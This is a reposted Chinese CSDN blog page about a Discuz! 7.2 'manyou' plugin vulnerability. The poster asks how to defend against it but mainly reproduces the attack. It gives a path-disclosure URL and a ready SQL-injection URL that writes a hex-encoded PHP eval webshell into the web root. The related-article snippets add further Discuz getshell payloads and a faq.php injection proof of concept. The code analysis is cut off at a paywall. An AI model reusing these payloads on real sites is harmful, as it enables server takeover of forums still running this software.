7.2 discuz 拿shell_DZ 7.2 漏洞 - Discuz!-BUG与问题交流 - Discuz! 官方站 - Powered by Discuz!...

最新推荐文章于 2023-05-15 17:41:42 发布
最新推荐文章于 2023-05-15 17:41:42 发布
阅读量343 收藏
点赞数
文章标签: 7.2 discuz 拿shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39748928/article/details/111846288
版权

我网站 最近老被入侵就在网上 查了查   不知道官网 我转了2个 入侵方法 过来 请 官网管理 和各位高手 看看该怎么预防

/manyou/admincp.php?my_suffix=%0A%0DTOBY57 爆路径

然后直接getshell

userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23

在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。

漏洞分析:

文件./manyou/sources/notice.php

相关代码:

if($option == 'del') {

$appid = intval($_GET['appid']);

$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");

showmessage('manyou:done', 'userapp.php?script=notice&action&#

最低0.47元/天 解锁文章
weixin_39748928
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
discuz7.2sql注入漏洞
weixin_40709439的博客
09-20 8304
今天尝试了discuz7.2动力论坛的sql注入漏洞 原因是由faq.php文件源码存在漏洞引起的 下载官方discuz7.2源码,在本地搭建漏洞环境 http://www.comsenz.com/downloads/install/discuz 下载的三个文件 利用http://localhost:8088/discuz72/upload/install/index.php进行安装...
discuz-getshell-auto-method2:Discuz 全自动GetShell 方法#2
05-11
Discuz 全自动 GetShell 本方法比写 config_ucenter.php 更加稳定,而且不易出错 用法 打开 dzhack.php, 找到 $webshell = '<?php phpinfo(); ?>'; list ($status, $data) = $dz->hack ( 'http://ubuntu64/dz/', 'K856C548X2xaTcDdc248I1pc57gdq4vdL2SdH3ifGd4a0ec6UdcfX0B7m9Ubrcs4', ... ); 先把第一行 $webshell 的内容改了,不需要考虑编码问题, 然后修改 hack 函数的参数,第一个为 discuz 的起始路径,第二行为你找到的 UC_KEY 然后执行 php dzhack.php, 会在 data/client.php 下面生成一个 webshell, ![Sc
oday-------------powered by discuz! 7.2
weixin_34240520的博客
05-23 468
利用google搜索关键字 intxt:powered by discuz! 7.2 找到一个论坛,注册一个账号注册好后,使用exp http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).ch...
discuz x1.5 discuz 7.2 后台getshell 0day通杀版出来
收集盒 Book box
03-20 2500
<br />discuz x1.5 discuz 7.2 后台getshell 0day通杀版,不知海浪做好防御没有~~~<br /><br /><br />附上 <br />从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,利用方式有所不同,下面开始。<br />一 Discuz! 6.0 和 Discuz! 7.0<br />既然要后台拿Shell,文件写入必看。<br />/include/cache.func.php<br /><br />往上翻,找到调用函数的地方.都在updateca
Discuz开源论坛_v3.4系列_远程代码执行漏洞详解
weixin_60708754的博客
05-15 4094
Discuz v3.4系列 远程代码执行漏洞全流程详解
TensorRT-7.2.2.3.Ubuntu-18.04.x86_64-gnu.cuda-11.0.cudnn8.0
05-15
TensorRT-7.2.2.3.Ubuntu-18.04.x86_64-gnu.cuda-11.0.cudnn8.0.tar.gz,安装tensorRT源码,适合cuda版本11.0 cudnn版本8.0
商业源码-编程源码-Discuz! v7.2 Bulid 20101020 简体GBK 独立安装包.zip
06-15
Discuz!是一款非常知名的开源社区论坛软件,由Comsenz公司开发,广泛应用于各类网,尤其是中文社区。这个“商业源码-编程源码-Discuz! v7.2 Bulid 20101020 简体GBK 独立安装包.zip”文件包含了Discuz!在2010年10...
商业源码-编程源码-Discuz! v7.2 Bulid 20101020 简体GBK 整合安装包.zip
06-15
Discuz!是一款非常知名的开源社区论坛软件,由Comsenz公司开发,广泛应用于各类网,尤其是中文社区。这个压缩包“商业源码-编程源码-Discuz! v7.2 Bulid 20101020 简体GBK 整合安装包.zip”包含了Discuz! v7.2版本...
商业源码-编程源码-Discuz! v7.2 Bulid 20101020 简体UTF8 整合安装包.zip
06-15
Discuz!是一款非常知名的开源社区论坛系统,由Comsenz公司开发。v7.2是其在2010年10月20日发布的一个版本,提供了简体中文和UTF-8编码的支持,适用于搭建多语言环境的论坛平台。这个整合安装包包含了运行Discuz!论坛...
商业源码-编程源码-Discuz! v7.2 Bulid 20101020 繁体UTF8 整合安装包.zip
06-15
Discuz!是一款非常知名的开源社区论坛软件,由Comsenz公司开发。这个“商业源码-编程源码-Discuz! v7.2 Bulid 20101020 繁体UTF8 整合安装包.zip”包含了Discuz!在2010年10月20日发布的版本7.2的完整源代码,以及...
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
Python写的Discuz7.2版faq.php注入漏洞工具
12-25
Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据,python 版的uc_key getshell部分的代码来自网上(感谢作者) 实现代码: #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: gb2312 -*- # -*- coding: utf_8 -*- # author iswin import sys import hashlib import time import math import base64 import urllib2 import urllib import r
Dz7.2 从获取uc key到getshell
weixin_30256901的博客
01-23 357
0x01下午在群里看到的 问下朋友大概 然后用不生不熟的sqlmap在那跑–表能跑的出 列就GG了 然后没辙–晚上跑各大论坛逛了遍果然大神多 就慢慢的研究下了下 看了pt0n大牛的分析文 真心感叹这洞 呵呵-。- 0x02获取uc key exp: faq.php?action=grouppermission&gids[99]='&amp...
复现一个老漏洞 Discuz!7.2 faq.php 注入漏洞 分析原理
Au
10-18 4136
源码~   http://pan.baidu.com/s/1gfkvJrX poc /faq.php?action=grouppermission&amp;gids[99]=%27&amp;gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20fr...
discuz 7.2 faq.php sql注入漏洞,Discuz <= 7.2 /faq.php SQL注入漏洞 EXP
weixin_36081891的博客
04-07 458
具体漏洞详情我就不多说了,大家可以看freebuf的介绍,链接在下方:http://www.freebuf.com/vuls/37643.html看了网上公布的一大堆exp,发现都不是很好用,就自己写了一个获取管理员帐号密码以及uc_key的就不说了,构造语句就可以了,主要在于getshell,思路主要都是参照http://www.wooyun.org/bugs/wooyun-2014-04813...
discuz! 7.2 manyou插件暴路径&Get Webshell 0day
04-06 1082
在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。漏洞分析:文件./manyou/sources/notice.php相关代码:if($option == del) {$appid = intval($_GET[appid]);$db->query("DELETE
Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战
weixin_34067049的博客
07-18 1266
Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战[antian365.com] simeon   最近网上公开了Discuz!7.2版本faq.php文件SQL注入0day,通过对文件漏洞分析以及实战测试,效果不错,公开利用exp的利用需要对SQL语句以及数据库等相当了解,在某些情况下需要多种技术配合才能最终攻克目标,下面就漏洞代码以及实战利用等进行探讨,对获取管理员密码的利用...
DZshell总结
weixin_30600503的博客
01-23 774
今天碰到一个dz,好久没拿了 ,拿下shell觉得应该总结一下 Uc_server默认密码 其实有了UC_SERVER就是有了网的全部权限了,有了UC_SERVER你可以重置管理员密码 可以进后台拿shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿 先说一下UCkey拿shell,uckey可以进uc_server后台看 附一张dz3的图 当然有了uc-serv...
aix_v7.2_install_7200-03-02-1846_flash_112018.iso
最新发布
12-23
aix_v7.2_install_7200-03-02-1846_flash_112018.iso是一个AIX操作系统安装文件的镜像。其中,“aix_v7.2”表示这是AIX 7.2版本的安装文件,“7200-03-02-1846”表示这是7200-03-02版本的安装文件,“flash_112018”...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值